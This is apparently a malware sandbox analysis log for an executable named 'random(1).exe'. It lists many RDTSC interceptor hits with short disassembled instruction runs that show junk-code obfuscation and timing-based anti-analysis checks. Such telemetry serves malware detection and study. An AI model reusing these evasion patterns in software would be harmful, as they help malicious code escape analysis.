Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B644F second address: 10B6455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6DC8 second address: 10B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F14 second address: 10B6F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F1E second address: 10B6F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F28 second address: 10B6F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F06D8518559h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8518556h 0x00000018 jp 00007F06D8518546h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B724F second address: 10B725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B725D second address: 10B7282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F06D8518546h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F06D8518554h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7282 second address: 10B7288 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7288 second address: 10B72A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8518550h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B72A3 second address: 10B72C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F06D8B4D9E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8B4D9D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7459 second address: 10B7469 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jnp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7469 second address: 10B746E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B746E second address: 10B747A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B75F7 second address: 10B7614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC394 second address: 10BC398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC515 second address: 10BC549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F06D8B4D9C6h 0x0000000a jmp 00007F06D8B4D9D2h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jnp 00007F06D8B4D9D2h 0x00000018 jmp 00007F06D8B4D9CAh 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC549 second address: 10BC551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBAB6 second address: 10BBABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBABA second address: 10BBACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06D851854Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBACE second address: 10BBB05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBB05 second address: 10BBB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC870 second address: 10BC874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC874 second address: 10BC889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jns 00007F06D8518546h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCB20 second address: 10BCB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCB28 second address: 10BCB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F06D851854Ah 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCE11 second address: 10BCE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC7B second address: 108EC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC8D second address: 108EC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC93 second address: 108EC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC97 second address: 108EC9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC9B second address: 106B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F06D8518548h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call dword ptr [ebp+122D281Dh] 0x0000002b jmp 00007F06D8518559h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EE30 second address: 108EE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F244 second address: 108F248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F248 second address: 108F256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F06D8B4D9CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F466 second address: 108F48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F06D8518548h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jnl 00007F06D851854Ch 0x00000016 jo 00007F06D851854Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F687 second address: 108F6B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, 48FEDA1Ch 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D2B63h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F06D8B4D9CEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6B6 second address: 108F6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6BA second address: 108F6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6C0 second address: 108F6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6C6 second address: 108F6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FA04 second address: 108FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 js 00007F06D8518556h 0x0000000b jmp 00007F06D8518550h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F06D8518548h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D215Ah], eax 0x00000031 push 0000001Eh 0x00000033 push edi 0x00000034 xor dword ptr [ebp+122D36F3h], eax 0x0000003a pop ecx 0x0000003b nop 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FA58 second address: 108FA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FDC6 second address: 108FE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F06D851854Ah 0x0000000f nop 0x00000010 jmp 00007F06D851854Dh 0x00000015 lea eax, dword ptr [ebp+124929EEh] 0x0000001b jns 00007F06D8518560h 0x00000021 push eax 0x00000022 jmp 00007F06D8518551h 0x00000027 mov dword ptr [esp], eax 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F06D8518548h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov dword ptr [ebp+12453EE4h], esi 0x0000004a add edx, 371AEF37h 0x00000050 lea eax, dword ptr [ebp+124929AAh] 0x00000056 nop 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F06D8518559h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AB2 second address: 10C0AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 jmp 00007F06D8B4D9D1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AD5 second address: 10C0AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AEF second address: 10C0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007F06D8B4D9E2h 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0B07 second address: 10C0B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F06D8518546h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0B14 second address: 10C0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F231 second address: 108F235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F235 second address: 108F244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D52 second address: 10C0D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D6B second address: 10C0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D6F second address: 10C0D75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D75 second address: 10C0D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D94 second address: 10C0D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D99 second address: 10C0DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CAh 0x00000007 js 00007F06D8B4D9CEh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C13C5 second address: 10C13FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F06D8518550h 0x00000019 jmp 00007F06D8518551h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C13FA second address: 10C1408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F06D8B4D9C8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C1575 second address: 10C158F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F06D8518546h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F06D851854Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C158F second address: 10C15B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CDh 0x00000009 jmp 00007F06D8B4D9D0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94BA second address: 10C94C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94C0 second address: 10C94CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8B4D9CAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94CF second address: 10C94DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8518546h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C98B1 second address: 10C98B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C98B8 second address: 10C98BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9A03 second address: 10C9A0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9A0E second address: 10C9A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DE3 second address: 10C9DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DE9 second address: 10C9DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DEF second address: 10C9DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9F56 second address: 10C9F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518550h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10CF571 second address: 10CF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10CF57B second address: 10CF585 instructions: 0x00000000 rdtsc 0x00000002 js 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E73 second address: 10D1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E79 second address: 10D1E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E97 second address: 10D1EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1EA3 second address: 10D1EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D2038 second address: 10D203C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D2192 second address: 10D219D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F06D8518546h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D979D second address: 10D97B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F06D8B4D9CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F06D8B4D9C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EBA second address: 10D9EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EBE second address: 10D9EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8B4D9CFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EF3 second address: 10D9F2A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F06D851854Ch 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F06D8518559h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9F2A second address: 10D9F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DA0D0 second address: 10DA0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD703 second address: 10DD707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD707 second address: 10DD715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F06D851854Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD715 second address: 10DD720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD720 second address: 10DD754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8518553h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F06D851854Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F06D851854Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DCD50 second address: 10DCD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD01B second address: 10DD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
